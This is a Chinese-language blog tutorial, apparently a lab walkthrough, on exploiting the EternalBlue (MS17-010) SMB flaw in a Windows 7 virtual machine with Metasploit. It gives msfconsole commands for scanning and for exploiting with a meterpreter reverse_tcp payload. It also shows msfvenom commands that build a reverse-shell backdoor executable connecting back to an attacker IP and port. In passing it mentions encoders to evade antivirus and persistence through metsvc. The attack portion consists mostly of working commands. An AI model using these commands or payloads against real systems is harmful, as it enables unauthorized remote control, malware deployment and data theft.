利用msf控制目标电脑

准备工作

  • kali Linux虚拟机一台
  • win7虚拟机一台(要关闭防火墙和杀软的)
  • 注意两台机器要连接到同一个网络

永恒之蓝漏洞

  • 简介:永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
  • SMB协议:它能被用于Web连接和客户端与服务器之间的信息沟通。
  • 攻击方式:恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

msf简介

  • Kali可直接使用,存放目录:/usr/share/MSF-framework/

  • Metasploit(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。

  • msf的六个模块

    • auxiliary
      负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等功能的辅助模块

    • exploits
      利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

    • payloads
      成功exploit之后,真正在目标系统执行的代码或指令。分为3种类型的payload,分别是single、stages和stagers。shellcode是特殊的payload,用于拿shell。

      single:all-in-one。完整的payload,这些payload都是一体化的,不需要依赖外部的库和包。
      stagers:目标计算机内存有限时,先传输一个较小的payload用于建立连接
      stages:利用stagers建立的连接下载后续payload

    • encoders
      对payload进行加密,躲避AntiVirus检查的模块

    • nops
      提高payload稳定性及维持大小。在渗透攻击构造恶意数据缓冲区时,常常要在真正要执行的Shellcode之前添加一段空指令区, 这样当触发渗透攻击后跳转执行ShellCode时,有一个较大的安全着陆区,从而避免受到内存 地址随机化、返回地址计算偏差等原因造成的ShellCode执行失败,提高渗透攻击的可靠性。

    • post
      后期渗透模块。在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、跳板攻击等操作

  • msfvenom

    • msfvenom是msfpayloadmsfencode的组合,将这两个工具集成在一个框架实例中,用来生成后门,在目标机上执行后门,在本地监听上线。
    • msfvenom —list platforms #查看支持系统平台
      msfvenom —list archs #查看支持的系统架构
      msfvenom -l payload #列出所有可用的payload
      msfvenom -l formats #列出所有的输出格式
      msfvenom -l encrypt #列出所有的加密方式
      msfvenom -l encoders #列出所有的编码器

利用永恒之蓝漏洞攻击win7

  • 打开kali终端,输入ifconfig 。可以看到inet 192.168.1.1,这是 kali的内网 ip,记录下它。
    在这里插入图片描述

  • 启动msf msfconsole
    在这里插入图片描述

  • 永恒之蓝漏洞编号为ms17-010
    输入搜索命令search ms17-010
    在这里插入图片描述

  • 利用辅助模块扫描目标
    use auxiliary/scanner/smb/smb_ms17_010或者use 1
    在这里插入图片描述查看所需设置:options
    设置目标地址:set rhosts +IP地址
    设置目标端口:set rpost +445
    攻击:run
    在这里插入图片描述

  • 利用攻击模块对目标进行攻击
    use exploit/windows/smb/doublepulsar_rce或者use 2
    在这里插入图片描述查看所需设置options
    设置目标地址:set RHOSTS 192.168.235.128
    设置目标端口:set RPORT 445
    设置payload:set payload windows/x64/meterpreter/reverse_tcp
    设置本地地址:set LHOST 192.168.1.139
    攻击:run或者exploit
    在这里插入图片描述

  • msfvenom生成后门木马

    • msfvenom -p 有效载荷 -f 输出格式 -o 输出文件
      msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe
      在这里插入图片描述打开主文件夹看到一个payload.exe的文件
      在这里插入图片描述
      msfvenom -p windows/meterpreter(要生成的模块)/reverse(反弹)_tcp lhost=攻击机(自己)的ip地址 lport=攻击机所开启监听的端口号 -f(要输出的文件格式)exe -o(output输出)shell.exe
      msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.137 lport=4444 -f exe -o shell.exe
  • 设置监听 use
    查看所需设置,开始设置,run
    然后当win7点击后,就能看到他上线了,开始各种操作

  • 设置编码

  • 权限维持metsvc的三个文件

  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值